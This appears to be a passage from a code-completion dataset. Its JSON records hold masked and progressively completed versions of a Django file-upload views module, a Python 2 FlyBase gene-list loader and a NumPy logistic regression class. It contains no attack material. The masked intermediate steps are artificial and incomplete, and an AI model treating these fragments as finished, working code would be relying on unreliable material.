os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = 
ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n file_id = request.GET['file_id']\n print('zip started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name\n )\n output_file_name = file_obj.filename + '.gz'\n try:\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) +\n '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n n = 100000000\n for chunk in iter(lambda : src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n print('zip complete ' + file_id)\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n file_obj.filename = output_file_name\n file_obj.file.name = new_file_name\n file_obj.offset = stats.st_size\n file_obj.save()\n out = {'zipped': True, 'file_name': output_file_name, 'file_size':\n new_file_size}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field('name')] = output_file_name\n auto_fields[DataFile().get_qualified_field('file_location')\n ] = new_file_name\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = jsonpickle.encode(out)\n return HttpResponse(out, 
content_type='json')\n",
"step-4": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef get_partial_uploads(request):\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id\n ).order_by('created_on')\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n 
out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n file_id = request.GET['file_id']\n print('zip started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name\n )\n output_file_name = file_obj.filename + '.gz'\n try:\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) +\n '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n n = 100000000\n for chunk in iter(lambda : src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n print('zip complete ' + file_id)\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n file_obj.filename = output_file_name\n file_obj.file.name = new_file_name\n file_obj.offset = stats.st_size\n file_obj.save()\n out = {'zipped': True, 'file_name': output_file_name, 'file_size':\n new_file_size}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field('name')] = output_file_name\n auto_fields[DataFile().get_qualified_field('file_location')\n ] = 
new_file_name\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = jsonpickle.encode(out)\n return HttpResponse(out, content_type='json')\n",
"step-5": "__author__ = 'fshaw'\nimport gzip\nimport hashlib\nimport os\nimport uuid\nimport json\nimport jsonpickle\nfrom chunked_upload.models import ChunkedUpload\nfrom chunked_upload.views import ChunkedUploadView, ChunkedUploadCompleteView\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.core.files.base import ContentFile\nfrom django.http import HttpResponse\nfrom django.template.context_processors import csrf\nfrom rest_framework.renderers import JSONRenderer\n\nimport web.apps.web_copo.schemas.utils.data_utils as d_utils\nimport web.apps.web_copo.utils.EnaUtils as u\nfrom dal.broker_da import BrokerDA\nfrom dal.copo_da import DataFile\nfrom web.apps.web_copo.rest.models import CopoChunkedUpload\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n\n '''\n '''\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n # this method is called for writing smaller files (<= 260MB) to disk, larger files use the\n # upload method in ChunkedUpload class\n\n from django.utils import timezone\n # need to make a chunked upload record to store deails of the file\n if request.method == 'POST':\n\n c = {}\n f = request.FILES['file']\n\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on': timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n # file starts empty\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n\n # create output structure to pass back to jquery-upload\n files = {'files': {}}\n files['files']['name'] = f._name\n\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n # retrieve incomplete file for user with this name\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id, filename=file_name).order_by(\n '-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef get_partial_uploads(request):\n user_id = 
request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id).order_by('created_on')\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef hash_upload(request):\n # utility method to create an md5 hash of a given file path\n # open uploaded file\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n\n # now hash opened file\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b''):\n md5.update(chunk)\n\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n\n # update record in mongo\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_hash\")] = file_obj.hash\n\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n BrokerDA(target_id=str(record_object.get(\"_id\", str())),\n component=component,\n auto_fields=auto_fields\n ).do_save_edit()\n\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n # utility method to examine a file and return meta-data to the frontend\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n\n # get reference to file\n file_id = request.GET['file_id']\n\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n\n # size threshold to determine if a file should be compressed\n zip_threshold = 200000000 # size in bytes\n\n # check if file is compressed\n is_zipped = u.is_gzipped(file_name)\n\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n\n # check for file type\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n\n else: # make file type same as extension\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[1]\n except:\n output_dict['file_type'] = 'unknown'\n\n # add datafile schema\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n\n # ...and obtain the inserted record\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_id\")] = file_id\n auto_fields[DataFile().get_qualified_field(\"file_type\")] = output_dict['file_type']\n auto_fields[DataFile().get_qualified_field(\"file_location\")] = file_name\n auto_fields[DataFile().get_qualified_field(\"file_size\")] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field(\"name\")] = chunked_upload.filename\n\n # get default type from schema\n type = [f for f in d_utils.get_copo_schema(component) if f.get(\"id\").split(\".\")[-1] == \"type\"]\n if type:\n type = type[0][\"default_value\"]\n auto_fields[DataFile().get_qualified_field(\"type\")] = 
type\n\n df = BrokerDA(context=dict(),\n profile_id=profile_id,\n component=component,\n auto_fields=auto_fields,\n visualize=\"last_record\"\n ).do_save_edit().get(\"record_object\", dict())\n\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n # need to get a reference to the file to zip\n file_id = request.GET['file_id']\n print(\"zip started \" + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n\n # get the name of the file to zip and change its suffix to .gz\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n output_file_name = file_obj.filename + '.gz'\n try:\n # open the file as gzip acrchive...set compression level\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) + '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n\n # write input file to gzip archive in n byte chunks\n n = 100000000\n for chunk in iter(lambda: src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n\n print('zip complete ' + file_id)\n # now need to delete the old file and update the file record with the new file\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n\n # calculate new file size\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n\n # update filename\n file_obj.filename = output_file_name\n file_obj.file.name = new_file_name\n\n # update file size\n file_obj.offset = stats.st_size\n file_obj.save()\n\n out = {'zipped': True, 'file_name': output_file_name, 'file_size': new_file_size}\n\n # update record in mongo\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_size\")] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field(\"name\")] = output_file_name\n auto_fields[DataFile().get_qualified_field(\"file_location\")] = new_file_name\n\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n BrokerDA(target_id=str(record_object.get(\"_id\", str())),\n component=component,\n auto_fields=auto_fields\n ).do_save_edit()\n\n out = jsonpickle.encode(out)\n return HttpResponse(out, content_type='json')\n",
"step-ids": [
12,
13,
14,
15,
18
]
}
|
[
12,
13,
14,
15,
18
] |
import os
import config
############################
# NMJ_RNAI LOF/GOF GENE LIST
def nmj_rnai_set_path():
return os.path.join(config.datadir, 'NMJ RNAi Search File.txt')
def nmj_rnai_gain_of_function_set_path():
return os.path.join(config.datadir, 'NMJ_RNAi_gain_of_function_flybase_ids.txt')
def get_nmj_rnai_genes():
'''
Return a list of flybase gene ids.
The hits from three different screens (Aaron D'Antonio, Sanyal and
Featherstone). This contains FBgn IDs, which can be converted to gene
symbols using flybase ID converter
'''
path = nmj_rnai_set_path()
print path
with open(path) as fh:
# Skip first line, the header
genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]
return genes
def get_nmj_rnai_gain_of_function_genes():
'''
Return a list of flybase gene ids.
The gain of function genes should be a curated subset of the NMJ RNAi
genes. They were defined in a file Elizabeth McNeill sent,
"NMJ RNAi Gainoffunctionscreens.xlsx".
The hits from three different screens (Aaron D'Antonio, Sanyal and
Featherstone). This contains FBgn IDs, which can be converted to gene
symbols using flybase ID converter.
'''
path = nmj_rnai_gain_of_function_set_path()
print path
with open(path) as fh:
# Skip first line, the header
genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]
return genes
|
normal
|
{
"blob_id": "6a9d64b1ef5ae8e9d617c8b0534e96c9ce7ea629",
"index": 4951,
"step-1": "\nimport os\n\nimport config\n\n\n############################\n# NMJ_RNAI LOF/GOF GENE LIST\n\ndef nmj_rnai_set_path():\n return os.path.join(config.datadir, 'NMJ RNAi Search File.txt')\n\n\ndef nmj_rnai_gain_of_function_set_path():\n return os.path.join(config.datadir, 'NMJ_RNAi_gain_of_function_flybase_ids.txt')\n\n\ndef get_nmj_rnai_genes():\n '''\n Return a list of flybase gene ids.\n\n The hits from three different screens (Aaron D'Antonio, Sanyal and\n Featherstone). This contains FBgn IDs, which can be converted to gene\n symbols using flybase ID converter \n '''\n path = nmj_rnai_set_path()\n print path\n with open(path) as fh:\n # Skip first line, the header\n genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]\n return genes\n\n\ndef get_nmj_rnai_gain_of_function_genes():\n '''\n Return a list of flybase gene ids.\n\n The gain of function genes should be a curated subset of the NMJ RNAi\n genes. They were defined in a file Elizabeth McNeill sent, \n \"NMJ RNAi Gainoffunctionscreens.xlsx\".\n\n The hits from three different screens (Aaron D'Antonio, Sanyal and\n Featherstone). This contains FBgn IDs, which can be converted to gene\n symbols using flybase ID converter.\n '''\n path = nmj_rnai_gain_of_function_set_path()\n print path\n with open(path) as fh:\n # Skip first line, the header\n genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]\n return genes\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
class LogisticRegression:
'''LogisticRegression for binary classification
    max_iter: the maximum number of iterations for training
    learning_rate: learning rate for gradient descent training
Input's shape should be [sample_nums, data_dims]
attrs:
max_iter
learning_rate
(after fit)
w
b
costs
methods:
fit
predict
predict_proba
score
'''
def __init__(self, max_iter=2000, learning_rate=0.01):
self.max_iter = max_iter
self.learning_rate = learning_rate
print('LogisticRegression Model(learning_rate={}, max_iteration={})'.format(
self.learning_rate, self.max_iter))
def sigmoid(self, z):
return 1 / (1 + np.exp(-z))
def initialize_with_zeros(self, dim):
w = np.zeros((dim, 1))
b = 0
assert (w.shape == (dim, 1))
assert (isinstance(b, float) or isinstance(b, int))
return w, b
def propagate(self, w, b, X, Y):
m = X.shape[0]
A = self.sigmoid(np.dot(X, w) + b)
cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))
dw = 1 / m * np.dot(X.T, A - Y)
db = 1 / m * np.sum(A - Y)
assert (dw.shape == w.shape)
assert (db.dtype == float)
cost = np.squeeze(cost)
assert (cost.shape == ())
grads = {'dw': dw,
'db': db}
return grads, cost
def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):
costs = []
for i in range(1, max_iter+1):
grads, cost = self.propagate(w, b, X, Y)
w -= learning_rate * grads['dw']
b -= learning_rate * grads['db']
if i % 100 == 0:
costs.append(cost)
if print_cost:
print('Cost after iteration %i: %f'%(i, cost))
return w, b, costs
def fit(self, X, Y, print_cost=False):
print('Fit starting:')
w, b = self.initialize_with_zeros(X.shape[1])
iter_time = 0
self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.max_iter, self.learning_rate, print_cost)
        print('Fit completed!')
def predict_proba(self, X):
return self.sigmoid(np.dot(X, self.w) + self.b)
def predict(self, X):
proba = self.predict_proba(X)
        pre = np.zeros_like(proba, dtype=int)
pre[proba > 0.5] = 1
pre = np.squeeze(pre)
return pre
def score(self, X_test, Y_test):
Y_pre = self.predict(X_test)
score = np.sum(Y_pre == Y_test) / len(Y_pre)
return score
def __str__(self):
return 'LogisticRegression Model(learning_rate={}, max_iteration={})'.format(
self.learning_rate, self.max_iter)
if __name__ == '__main__':
from sklearn import datasets
from sklearn.model_selection import train_test_split
data = datasets.load_iris()
x = data.data[:100, [0,1]]
# x = np.hstack([np.ones((100, 1)), x])
y = np.array([1 if i > 0 else 0 for i in data.target[:100]])
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
model = LogisticRegression()
model.fit(x_train, y_train.reshape(len(y_train), -1), True)
print('Train Score:{}'.format(model.score(x_train, y_train)))
print('Test Score:{}'.format(model.score(x_test, y_test)))
plt.subplot(211)
x_samples = np.linspace(4, 7, 500)
y_samples = (- model.b - model.w[0]*x_samples) / model.w[1]
plt.plot(x_samples, y_samples, 'r')
plt.scatter(x[:50, 0], x[:50, 1], label='negative')
plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')
plt.xlabel('petal length')
plt.ylabel('petal width')
plt.title('LosRes Results on iris datasets')
plt.legend()
plt.subplots_adjust(hspace=0.5,wspace=0.25)
plt.subplot(212)
plt.plot(range(len(model.costs)), model.costs, '-o')
plt.xlabel('steps')
plt.ylabel('loss')
plt.title('loss function')
plt.show()
|
normal
|
{
"blob_id": "1dd62264aafe8ee745a3cfdfb994ac6a40c1af42",
"index": 1848,
"step-1": "<mask token>\n\n\nclass LogisticRegression:\n <mask token>\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n <mask token>\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n <mask token>\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LogisticRegression:\n <mask token>\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\n<mask token>\n",
